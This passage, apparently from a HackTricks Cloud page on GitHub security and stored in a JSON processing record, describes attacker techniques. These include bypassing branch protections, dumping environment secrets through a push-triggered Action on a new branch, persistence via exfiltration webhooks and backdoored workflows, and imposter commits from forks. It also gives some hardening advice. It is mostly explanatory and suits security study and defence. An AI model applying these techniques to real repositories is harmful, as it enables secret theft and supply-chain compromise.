observed in the wild:\n- Full code execution on the production runner that executed the linter\n- Exfiltration of sensitive environment variables, including the GitHub App private key used by the service, API keys, DB credentials, etc.\n- With a leaked GitHub App private key you can mint installation tokens and get read/write access to all repositories granted to that app (see the section above on GitHub App impersonation)\n\nHardening guidelines for services running external tools:\n- Treat repository\u2011provided tool configs as untrusted code\n- Execute tools in tightly isolated sandboxes with no sensitive environment variables mounted\n- Apply least\u2011privilege credentials and filesystem isolation, and restrict/deny outbound network egress for tools that don\u2019t require internet access\n\n## Branch Protection Bypass\n\n- **Require a number of approvals**: If you compromised several accounts you might just accept your PRs from other accounts. If you just have the account from where you created the PR you cannot accept your own PR. However, if you have access to a **Github Action** environment inside the repo, using the **GITHUB_TOKEN** you might be able to **approve your PR** and get 1 approval this way.\n - _Note for this and for the Code Owners restriction that usually a user won't be able to approve his own PRs, but if you are, you can abuse it to accept your PRs._\n- **Dismiss approvals when new commits are pushed**: If this isn\u2019t set, you can submit legit code, wait till someone approves it, and put malicious code and merge it into the protected branch.\n- **Require reviews from Code Owners**: If this is activated and you are a Code Owner, you could make a **Github Action create your PR and then approve it yourself**.\n - When a **CODEOWNER file is missconfigured** Github doesn't complain but it does't use it. Therefore, if it's missconfigured it's **Code Owners protection isn't applied.**\n- **Allow specified actors to bypass pull request requirements**: If you are one of these actors you can bypass pull request protections.\n- **Include administrators**: If this isn\u2019t set and you are admin of the repo, you can bypass this branch protections.\n- **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything.\n- **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back.\n- **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`).\n - If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**.\n\n## Bypass Environments Protections\n\nFor an introduction about [**Github Environment check the basic information**](basic-github-information.md#git-environments).\n\nIn case an environment can be **accessed from all the branches**, it's **isn't protected** and you can easily access the secrets inside the environment. Note that you might find repos where **all the branches are protected** (by specifying its names or by using `*`) in that scenario, **find a branch were you can push code** and you can **exfiltrate** the secrets creating a new github action (or modifying one).\n\nNote, that you might find the edge case where **all the branches are protected** (via wildcard `*`) it's specified **who can push code to the branches** (_you can specify that in the branch protection_) and **your user isn't allowed**. You can still run a custom github action because you can create a branch and use the push trigger over itself. The **branch protection allows the push to a new branch so the github action will be triggered**.\n\n```yaml\npush: # Run it when a push is made to a branch\n branches:\n - current_branch_name #Use '**' to run when a push is made to any branch\n```\n\nNote that **after the creation** of the branch the **branch protection will apply to the new branch** and you won't be able to modify it, but for that time you will have already dumped the secrets.\n\n## Persistence\n\n- Generate **user token**\n- Steal **github tokens** from **secrets**\n - **Deletion** of workflow **results** and **branches**\n- Give **more permissions to all the org**\n- Create **webhooks** to exfiltrate information\n- Invite **outside collaborators**\n- **Remove** **webhooks** used by the **SIEM**\n- Create/modify **Github Action** with a **backdoor**\n- Find **vulnerable Github Action to command injection** via **secret** value modification\n\n### Imposter Commits - Backdoor via repo commits\n\nIn Github it's possible to **create a PR to a repo from a fork**. Even if the PR is **not accepted**, a **commit** id inside the orginal repo is going to be created for the fork version of the code. Therefore, an attacker **could pin to use an specific commit from an apparently ligit repo that wasn't created by the owner of the repo**.\n\nLike [**this**](https://github.com/actions/checkout/commit/c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e):\n\n```yaml\nname: example\non: [push]\njobs:\n commit:\n runs-on: ubuntu-latest\n steps:\n - uses: actions/checkout@c7d749a2d57b4b375d1ebcd17cfbfb60c676f18e\n - shell: bash\n run: |\n echo 'hello world!'\n```\n\nFor more info check ## References\n\n- [How we exploited CodeRabbit: from a simple PR to RCE and write access on 1M repositories(https://research.kudelskisecurity.com/2025/08/19/how-we-exploited-coderabbit-from-a-simple-pr-to-rce-and-write-access-on-1m-repositories/)\n- [Rubocop extensions (require)](https://docs.rubocop.org/rubocop/latest/extensions.html)\n- [Authenticating with a GitHub App (JWT)](https://docs.github.com/en/apps/creating-github-apps/authenticating-with-a-github-app)\n- [List installations for the authenticated app](https://docs.github.com/en/rest/apps/apps?apiVersion=2022-11-28#list-installations-for-the-authenticated-app)\n- [Create an installation access token for an app](https://docs.github.com/en/rest/apps/apps?apiVersion=2022-11-28#create-an-installation-access-token-for-an-app)\n\n{{#include ../../banners/hacktricks-training.md}}",
  "error": null,
  "processed_at": "2026-03-22T02:46:52.467914+00:00",
  "output_path": "data/processed/documents/hacktricks-cloud-github-security.json"
}
